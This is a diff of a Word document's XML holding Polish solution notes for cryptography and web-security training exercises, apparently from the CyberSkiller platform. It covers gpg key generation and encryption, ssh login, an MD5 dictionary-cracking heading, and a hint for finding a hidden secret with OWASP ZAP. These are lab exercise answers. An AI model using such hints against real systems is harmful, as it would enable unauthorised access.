+            <w:b w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/yW_ZCp0OpIE</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>odpalamy OWASP -&gt; manual explorer -&gt; wklejamy url, odhaczamy ‘Enbable HUD’ i odpalamy -&gt; szukamy żądania z najmniejszym rozmiarem response body (1615b) i tam powinna być odpowiedź z secret</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:sectPr>

--- a/BSS.docx
+++ b/BSS.docx
@@ -20,7 +20,15 @@
         <w:t>2121</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Funkcja skrótu SHA3 </w:t>
+        <w:t xml:space="preserve">Funkcja </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>skrótu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> SHA3 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -33,9 +41,35 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:t>Łamanie skrótu MD5 metodą słownikową</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Łamanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>skrótu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> MD5 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metodą</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>słownikową</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="label"/>
@@ -47,40 +81,137 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:t>Odszyfrowanie pliku szyfrem AES</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Kod uwierzytelniający HMAC</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Algorytm PBKDF2 z niestandardową liczbą iteracji </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Identyfikacja algorytmu szyfrującego </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Szyfrowany plik Zip </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Odszyfrowanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pliku</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>szyfrem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> AES</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Kod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>uwierzytelniający</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> HMAC</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Algorytm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> PBKDF2 z </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>niestandardową</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>liczbą</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>iteracji</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Identyfikacja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>algorytmu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>szyfrującego</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Szyfrowany</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>plik</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Zip </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -95,6 +226,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -103,7 +235,40 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Generowanie kluczy RSA</w:t>
+        <w:t>Generowanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>kluczy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> RSA</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -120,9 +285,43 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:t>Generowanie kluczy na krzywych eliptycznych</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Generowanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kluczy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>krzywych</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>eliptycznych</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -145,9 +344,27 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:t>Szyfrowanie kluczem publicznym</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Szyfrowanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kluczem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>publicznym</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -170,8 +387,37 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Certyfikat na podstawie zapytania </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Certyfikat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>podstawie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>zapytania</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -195,14 +441,28 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Generowanie klucza PGP </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Generowanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>klucza</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> PGP </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:rStyle w:val="Hipercze"/>
           <w:b w:val="0"/>
         </w:rPr>
       </w:pPr>
@@ -217,11 +477,239 @@
       </w:hyperlink>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Szyfrowanie za pomocą klucza PGP </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gpg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> --gen-key</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Jako</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>imię</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nazwisko</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wklejamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tekst</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> z </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>zadania</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Dowolny</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adres</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> email</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Wybieramy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dalej</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gpg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> --export  --armor „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tekst</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> z </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>zadania</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">” </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Szyfrowanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> za </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pomocą</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>klucza</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> PGP </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Wklejamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>klucz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> z </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>zadania</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pub.pem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gpg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> --show-key </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pub.pem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gpg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> --import </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pub.pem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">echo -n „text z </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adania</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">| </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gpg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> --encrypt --armor --recipient contact@cyberskiller.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -245,14 +733,36 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:t>Odszyfrowanie za pomocą klucza PGP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Odszyfrowanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> za </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pomocą</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>klucza</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> PGP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:rStyle w:val="Hipercze"/>
           <w:b w:val="0"/>
         </w:rPr>
       </w:pPr>
@@ -267,13 +777,198 @@
       </w:hyperlink>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Automatyczne wylogowywanie</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gpg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> --gen-key </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Wpisujemy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dowolne</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dane</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Email np test@cyberskiller.com</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ustawiamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hasło</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gpg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> --export --armor </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId13" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink2"/>
+          </w:rPr>
+          <w:t>test@cyberskiller.com</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Jako</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>odpowiedź</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wklejamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wygenerowany</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>klucz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>publiczny</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Dostajemy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> PGP MESSAGE</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Wklejamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ją</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>data.enc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Wpisujemy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gpg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> --decrypt </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>data.enc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Automatyczne</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wylogowywanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -284,7 +979,7 @@
           <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId13" w:history="1">
+      <w:hyperlink r:id="rId14" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -303,12 +998,29 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>ssh -l alic</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>ssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>alic</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -317,28 +1029,70 @@
         </w:rPr>
         <w:t>e</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ssh -l alice </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>[host_ip]</w:t>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>ssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>alice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
